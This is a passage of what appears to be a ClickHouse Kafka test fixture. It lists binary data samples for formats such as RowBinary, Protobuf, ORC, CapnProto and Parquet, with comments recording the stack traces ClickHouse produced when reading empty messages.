b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x